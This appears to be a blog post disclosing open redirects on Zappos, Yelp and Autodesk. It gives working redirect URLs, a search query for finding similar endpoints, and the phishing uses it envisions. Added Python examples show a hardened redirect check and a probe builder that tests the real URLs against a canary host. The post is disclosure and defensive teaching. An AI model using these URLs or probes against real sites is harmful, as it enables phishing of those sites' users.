Zappos Redirect Exploit

So I saw this interesting link bait on my Facebook feed, but the source of it happened to be Zappos.com. I thought it could have been from a Zappos blog, since those guys happen to be pretty hip and could have shared it; however, when I clicked the link it redirected me to a seemingly malicious site meant to spread more of this malicious page.

Now I decided to see if I could replicate this, just to make sure I wasn’t crazy.

http://www.zappos.com/bin/zapposset?src=google&ref=googk2zappos_731072p27&tgt=http%3A%2F%2Fmorselcode.com%2F&h=sAQCH4MaP

Turns out it was easy: you only need to replace the tgt parameter with any URL-encoded URL and the page will redirect you to it. The redirect script never checks that the target is on zappos.com, which is a textbook open redirect.

Now the value of this exploit is roughly the value of the trust people place in the zappos.com domain. If people trust that URL, you can easily convince them to click it, and sharing it on Facebook, Twitter or any other social network would be easy and make it look legitimate. Possible uses are phishing in general, phishing specifically for Zappos.com credentials, or simply feeding the browser an exploit and possibly compromising the victim's machine.
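To make the bug concrete, here is the unchecked redirect pattern beside a hardened version of the same handler. This is an added example and not zappos.com's code (their implementation is not public); the handler names, the allow-list and the way the target is read from the query string are assumptions for illustration. The sample query string is the one from the link above.

```python
"""Open redirect: the unchecked pattern beside a hardened one.

Added example, not zappos.com's code. ALLOWED_HOSTS, the function names and
the query-string handling are assumptions made for illustration.
"""
from urllib.parse import parse_qs, urlsplit

# Hosts this site is willing to send its own users to (assumed allow-list).
ALLOWED_HOSTS = frozenset({"zappos.com", "www.zappos.com"})

# Constructed from the URL in the post; a web framework decodes it once.
SAMPLE_QUERY = ("src=google&ref=googk2zappos_731072p27"
                "&tgt=http%3A%2F%2Fmorselcode.com%2F&h=sAQCH4MaP")


def target_from_query(query: str, param: str = "tgt") -> str:
    """Pull the redirect target out of a query string, decoded once."""
    return parse_qs(query, keep_blank_values=True).get(param, [""])[0]


def redirect_unchecked(tgt: str) -> str:
    """Vulnerable pattern: whatever arrived in ?tgt= becomes the Location header."""
    return tgt


def is_safe_redirect_target(target: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """True only for same-site targets: a local path, or http(s) to an allow-listed host.

    Validate exactly the string that will be emitted as Location. Decoding it
    again here and then emitting the raw value would mean checking one
    representation and sending another, which is itself a bypass.
    """
    if not target:
        return False
    # Control characters could split headers; browsers treat '\' as '/',
    # so '/\evil.com' would land on evil.com.
    if any(ord(c) < 0x20 for c in target) or "\\" in target:
        return False
    parts = urlsplit(target)
    if not parts.scheme and not parts.netloc:
        # Relative target: exactly one leading '/'. ('//evil.com' parses
        # with a netloc and is rejected below; '///evil.com' is caught here.)
        return target.startswith("/") and not target.startswith("//")
    if parts.scheme not in ("http", "https"):
        return False  # rejects javascript:, data:, and scheme-relative '//host'
    # .hostname drops userinfo and port, so 'www.zappos.com@evil.com' is
    # judged on 'evil.com', and 'www.zappos.com.evil.com' is simply not listed.
    return (parts.hostname or "") in allowed_hosts


def redirect_checked(tgt: str, fallback: str = "/") -> str:
    """Hardened pattern: send off-site targets to the home page instead."""
    return tgt if is_safe_redirect_target(tgt) else fallback


if __name__ == "__main__":
    tgt = target_from_query(SAMPLE_QUERY)
    print("unchecked ->", redirect_unchecked(tgt))  # follows the attacker's URL
    print("checked   ->", redirect_checked(tgt))    # falls back to "/"
```

The bypass shapes in the check (scheme-relative `//host`, backslashes, userinfo tricks, look-alike subdomains, non-http schemes) are exactly the ones a naive "does it start with our domain" string test gets wrong; an allow-list of hosts plus relative paths is the shape that holds up.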

EDIT: After getting an email from Joe Levy, he told me to do a Google search (inurl:"target=http", and variants thereof) to find new URLs that could potentially be exploitable, and within a minute I found that Yelp.com and Autodesk also had easy-to-exploit redirect scripts.

http://usa.autodesk.com/adsk/servlet/oc/redir?siteID=123112&url=http%3A%2F%2Fmorselcode.com

http://www.yelp.com/redir?url=http%3A%2F%2Fwww.morselcode.com
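The search in the EDIT only finds candidates; confirming each one means swapping the redirect parameter for a host you control and checking where the response sends you. The following is an added example, not part of the original post or any of the sites' code. It makes no network request: it builds the probe URL you would fetch and judges the status and Location header you would get back. The canary host and the list of parameter names are assumptions.

```python
"""Turn a URL that carries a redirect parameter into an open-redirect probe.

Added example, not from the post. Builds the probe and judges the response;
fetching is left to the caller. REDIRECT_PARAMS and CANARY are assumptions.
"""
from __future__ import annotations

from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Parameter names commonly used for redirect targets (assumed, not exhaustive).
REDIRECT_PARAMS = frozenset({
    "url", "tgt", "target", "redir", "redirect", "redirect_uri", "next",
    "return", "returnurl", "return_to", "dest", "destination", "goto",
    "continue", "u", "r",
})
CANARY = "http://canary.example/"  # a host you control (assumed)

# Constructed from the three links in the post.
LINKS = (
    "http://www.zappos.com/bin/zapposset?src=google&ref=googk2zappos_731072p27"
    "&tgt=http%3A%2F%2Fmorselcode.com%2F&h=sAQCH4MaP",
    "http://usa.autodesk.com/adsk/servlet/oc/redir?siteID=123112&url=http%3A%2F%2Fmorselcode.com",
    "http://www.yelp.com/redir?url=http%3A%2F%2Fwww.morselcode.com",
)


def looks_like_redirect_param(name: str, value: str) -> bool:
    """Name is on the list, or the value is already an absolute or scheme-relative URL."""
    return (name.lower() in REDIRECT_PARAMS
            or value.startswith(("http://", "https://", "//")))


def redirect_probes(url: str, canary: str = CANARY) -> list[str]:
    """One probe URL per candidate parameter, with that value swapped for the canary.

    Every other parameter (src, ref, h, siteID ...) is preserved unchanged so
    the endpoint sees the request it expects apart from the target.
    """
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    probes = []
    for i, (name, value) in enumerate(pairs):
        if not looks_like_redirect_param(name, value):
            continue
        swapped = pairs[:i] + [(name, canary)] + pairs[i + 1:]
        probes.append(urlunsplit(parts._replace(query=urlencode(swapped))))
    return probes


def confirms_open_redirect(status: int, location: str | None,
                           canary: str = CANARY) -> bool:
    """A 3xx whose Location lands on the canary host confirms the redirect is open.

    Compare hosts, not string prefixes: being sent to
    http://canary.example.victim.com/ is not an off-site redirect.
    """
    if not (300 <= status < 400) or not location:
        return False
    return urlsplit(location).hostname == urlsplit(canary).hostname


if __name__ == "__main__":
    for link in LINKS:
        for probe in redirect_probes(link):
            print(probe)  # fetch with redirects disabled, then call confirms_open_redirect()
```

Fetch each probe with automatic redirect following turned off, then pass the status code and Location header to `confirms_open_redirect`; a 200 that redirects via a meta refresh or JavaScript would need a separate body check that this example does not attempt.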